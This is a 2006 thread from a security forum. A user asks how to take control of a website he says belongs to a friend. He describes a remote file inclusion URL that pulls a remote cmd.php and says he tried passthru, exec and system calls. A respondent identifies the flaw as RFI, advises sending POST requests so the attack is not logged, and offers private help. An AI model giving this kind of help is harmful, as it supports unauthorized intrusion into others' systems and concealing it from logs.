|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 90
Members: 0
Total: 90
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
make use of a misconfigured php |
|
Posted: Mon May 15, 2006 10:02 pm |
|
|
tux |
Beginner |
|
|
Joined: May 16, 2006 |
Posts: 1 |
|
|
|
|
|
|
|
hi all,
first of all i gotta say, that i've been visiting and reading these forums regulary for some time now. and i really learned a lot. thank you all for this.
now i got a problem. there is a website i want to get control of, running phpbb 2.0.18, disallowing html, etc. so there is no actual possibility to exploit the forum software, as well as any other remotely-accessible software installed on this host (to my knowledge). but i discovered something else, very interesting.
i can call a php-script (not related to phpbb) and get to display remote webpages/-apps inside the mainsite. it's no iframe or anything alike, but poorly written php (i must admit, i don't think i would have made it any better...). of course i tried to exploit this misbehaviour by calling a script from a remote host to execute commands on the target host. without luck.
the url looks like this: http://xxx.de/?seite=http://yyy.de/cmd.php
i tried every possible combination via passthru(), exec(), system() etc. in the cmd.* file, but it parses the php file on the remote host and displays the output on the target host. when changing the file to *.txt or *.gif or whatever, there is no output at all. also nesting php tags inside the php tags shows no difference.
i am really lost and definately want to succeed. its a friends site i want to have some 'polite' fun with. i really don't want to destroy things or whatever.
i already succeeded with this method elsewhere, but this one is quite important for me
if there is anyone who could help me out, like pointing me into the right direction, that would be great!
thanks in advance and please excuse my english, since im german. curious and willing to learn. pls help me with this one. i am even willing to name you a host you could have a lot of fun with (more or less - who knows).
philipp |
|
|
|
|
|
|
|
|
Posted: Tue May 16, 2006 6:47 am |
|
|
daemon_azazel |
Regular user |
|
|
Joined: Apr 16, 2006 |
Posts: 17 |
|
|
|
|
|
|
|
show up the vulnerable php script source and i will tell you
what's that about. so far i understood you found some RFI?
btw, don't use GET - this got logged and you may experience
some issues later... allways use POST - much wise i can tell you. |
|
|
|
|
Posted: Wed May 17, 2006 1:10 pm |
|
|
tux |
Beginner |
|
|
Joined: May 16, 2006 |
Posts: 1 |
|
|
|
|
|
|
|
yes. i think you're right. this seems to be a remote file inclusion vulnerability. sorry for posting in the wrong forum then.
now i don't know the source code of this php script. it seems to be written by himself. so is there a way to get the code without asking him to show me?
thank you for trying to help!
regards
philipp |
|
|
|
|
Posted: Wed May 17, 2006 1:50 pm |
|
|
daemon_azazel |
Regular user |
|
|
Joined: Apr 16, 2006 |
Posts: 17 |
|
|
|
|
|
|
|
well so you don't know the source...
and how did you noticed this?
send me a PM with the URL and iwill try to help you.
edit: btw that including thru ?seite= may be also some local inclusion,
i doubt some coder may be so stupid and include remotely whole URL's |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|